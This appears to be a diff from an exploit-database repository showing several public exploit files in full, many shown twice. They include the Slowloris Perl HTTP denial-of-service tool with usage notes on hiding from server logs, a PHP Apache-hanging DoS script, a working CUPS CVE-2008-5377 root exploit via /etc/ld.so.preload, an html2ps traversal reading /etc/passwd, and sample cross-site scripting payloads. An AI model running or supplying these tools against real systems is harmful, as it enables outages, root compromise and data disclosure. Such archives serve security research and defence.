Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4
# milw0rm.com [2009-06-17]
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighthttpd, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4
# milw0rm.com [2009-06-17]


@ -1,94 +1,94 @@
<?php
/*
DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601
I wrote it in PHP because I find it funny to make PHP attack apache...
I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez...
greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT, bastard labs, neonfreon and everyone else you know who you are.....
--evilrabbi b4b0
*/
/**
* Usage function...
*
* @param $argv array
* @return void
*/
function usage($argv)
{
print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or hostname>\n";
die();
}
/**
* Hangs the connection to the webserver
*
* @param $server string
* @return void
*/
function killTheFucker($server)
{
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: {$server}\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Content-Length: " . rand(1, 1000) . "\r\n";
$request .= "X-a: " . rand(1, 10000) . "\r\n";
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
{
sleep(15);
}
}
/**
* main function
* @param $argc int
* @param $argv array
* @return void
*/
function main($argc, $argv)
{
$status = 1;
if ($argc < 3)
{
usage($argv);
}
$pids = Array();
for ($i = 0; $i < $argv[1]; $i++)
{
$pid = pcntl_fork();
if ($pid == -1)
{
die("ERROR!@# YOU MADE BABY JESUS CRY");
}
else if ($pid == 0)
{
killTheFucker($argv[2]);
exit(0);
}
else
{
$pids[] = $pid;
}
}
foreach ($pids as $pid)
{
pcntl_waitpid($pid, $status);
}
}
// fire everything up
main($argc, $argv);
# milw0rm.com [2009-06-22]
<?php
/*
DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601
I wrote it in PHP because I find it funny to make PHP attack apache...
I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez...
greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT, bastard labs, neonfreon and everyone else you know who you are.....
--evilrabbi b4b0
*/
/**
* Usage function...
*
* @param $argv array
* @return void
*/
function usage($argv)
{
print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or hostname>\n";
die();
}
/**
* Hangs the connection to the webserver
*
* @param $server string
* @return void
*/
function killTheFucker($server)
{
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: {$server}\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Content-Length: " . rand(1, 1000) . "\r\n";
$request .= "X-a: " . rand(1, 10000) . "\r\n";
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
{
sleep(15);
}
}
/**
* main function
* @param $argc int
* @param $argv array
* @return void
*/
function main($argc, $argv)
{
$status = 1;
if ($argc < 3)
{
usage($argv);
}
$pids = Array();
for ($i = 0; $i < $argv[1]; $i++)
{
$pid = pcntl_fork();
if ($pid == -1)
{
die("ERROR!@# YOU MADE BABY JESUS CRY");
}
else if ($pid == 0)
{
killTheFucker($argv[2]);
exit(0);
}
else
{
$pids[] = $pid;
}
}
foreach ($pids as $pid)
{
pcntl_waitpid($pid, $status);
}
}
// fire everything up
main($argc, $argv);
# milw0rm.com [2009-06-22]


@ -1,102 +1,102 @@
/*
* cve-2008-5377.c
*
* CUPS < 1.3.8-4 pstopdf filter exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc cve-2008-5377.c -o cve-2008-5377.c
* $ ./cve-2008-5377
* $ id
* uid=0(root) gid=1000(vm) ...
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
*
* pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
* a symlink attack on the /tmp/pstopdf.log temporary file.
*
* Operation:
*
* The exploit creates and prints a malformed postscript document that will
* cause the CUPS pstopdf filter to write an error message out to its log
* file that contains the string /tmp/getuid.so. However, since we also
* symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
* error message and malicious shared library path will be appended to the
* ld.so.preload file, allowing us to elevate privileges to root.
*
* Note:
*
* This exploit only works under the (rare) conditions that cupsd executes
* external filters as a privileged user, a printer on the system uses the
* pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
* must be world readable.
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
int
main(void)
{
int ret;
FILE *fp;
struct stat log;
fp = fopen("/tmp/cve-2008-5377.ps", "w");
if(!fp) {
printf("error: cannot open /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
fclose(fp);
fp = fopen("/tmp/getuid.c", "w");
if(!fp) {
printf("error: cannot open /tmp/getuid.c\n");
goto cleanup;
}
fprintf(fp, "int getuid(){return 0;}\n");
fclose(fp);
ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
if (WEXITSTATUS(ret) != 0) {
printf("error: cannot compile /tmp/getuid.c\n");
goto cleanup;
}
unlink("/tmp/pstopdf.log");
ret = stat("/tmp/pstopdf.log", &log);
if (ret != -1) {
printf("error: /tmp/pstopdf.log already exists\n");
goto cleanup;
}
ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
if (ret == -1) {
printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
goto cleanup;
}
ret = system("lp < /tmp/cve-2008-5377.ps");
if (WEXITSTATUS(ret) != 0) {
printf("error: could not print /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
cleanup:
unlink("/tmp/cve-2008-5377.ps");
unlink("/tmp/getuid.c");
return 0;
}
// milw0rm.com [2008-12-22]
/*
* cve-2008-5377.c
*
* CUPS < 1.3.8-4 pstopdf filter exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc cve-2008-5377.c -o cve-2008-5377.c
* $ ./cve-2008-5377
* $ id
* uid=0(root) gid=1000(vm) ...
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
*
* pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
* a symlink attack on the /tmp/pstopdf.log temporary file.
*
* Operation:
*
* The exploit creates and prints a malformed postscript document that will
* cause the CUPS pstopdf filter to write an error message out to its log
* file that contains the string /tmp/getuid.so. However, since we also
* symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
* error message and malicious shared library path will be appended to the
* ld.so.preload file, allowing us to elevate privileges to root.
*
* Note:
*
* This exploit only works under the (rare) conditions that cupsd executes
* external filters as a privileged user, a printer on the system uses the
* pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
* must be world readable.
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
int
main(void)
{
int ret;
FILE *fp;
struct stat log;
fp = fopen("/tmp/cve-2008-5377.ps", "w");
if(!fp) {
printf("error: cannot open /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
fclose(fp);
fp = fopen("/tmp/getuid.c", "w");
if(!fp) {
printf("error: cannot open /tmp/getuid.c\n");
goto cleanup;
}
fprintf(fp, "int getuid(){return 0;}\n");
fclose(fp);
ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
if (WEXITSTATUS(ret) != 0) {
printf("error: cannot compile /tmp/getuid.c\n");
goto cleanup;
}
unlink("/tmp/pstopdf.log");
ret = stat("/tmp/pstopdf.log", &log);
if (ret != -1) {
printf("error: /tmp/pstopdf.log already exists\n");
goto cleanup;
}
ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
if (ret == -1) {
printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
goto cleanup;
}
ret = system("lp < /tmp/cve-2008-5377.ps");
if (WEXITSTATUS(ret) != 0) {
printf("error: could not print /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
cleanup:
unlink("/tmp/cve-2008-5377.ps");
unlink("/tmp/getuid.c");
return 0;
}
// milw0rm.com [2008-12-22]


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37338/info
The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities.
An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks.
The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.
Versions prior to the following are vulnerable:
Network Management Card Firmware 3.7.2
Network Management Card Firmware 5.1.1
http://www.example.com/Forms/login1?login_username=<ScRiPt>alert(&#039;hello&#039;);</ScRiPt>


@ -1,17 +0,0 @@
Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual
Apliance 5.0
Internal Cybsec Advisory Id: 2010-0604
Vulnerability Class: Local Privilege Escalation
Release Date: 22-06-2010
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected
Affected Platforms: Red Hat nash 5.1
Local / Remote: Local
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Ivan Huertas
Vendor Status: Patched
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
Vulnerability Description:
InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf


@ -1,46 +0,0 @@
#!/usr/bin/env python
#
# html2ps <= 1.0 beta5 arbitrary file disclosure
# http://user.it.uu.se/~jan/html2ps.html
# author: epiphant <epiphant.0@gmail.com>
#
# the "include file" ssi directive doesn't check for directory
# traversal so you can include and disclose any file in the
# dir tree (very handy when html2ps is running as a part of a
# web app with data that you control)
# the vuln requires that "ssi" in the @html2ps block in the
# html2psrc file is set to 1, which is the default
#
# bonus info: some of the backtick operators look shady too
# but will require lots of prerequisites so they're uncool
#
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
# jan k: shame on you - your perl is very ugly
#
import os
d = """\
<html>
<head>
<title>epiphant</title>
</head>
<body>
<h1>epiphant</h1>
<!--#include file="../../../../../../../etc/passwd"-->
<p>epiphant</p>
</body>
</html>
"""
try:
fi = open("epiphant.html", "w")
fi.write(d)
fi.close()
except:
print "can't write here"
exit(1)
os.system("html2ps epiphant.html > epiphant.ps")
os.system("gv epiphant.ps")
exit(0)

20
platforms/php/remote/33414.php Executable file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/37389/info
PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
Versions prior to PHP 5.2.12 are vulnerable.
// overlong UTF-8 sequence
echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
// invalid Shift_JIS sequence
echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
// invalid EUC-JP sequence
echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
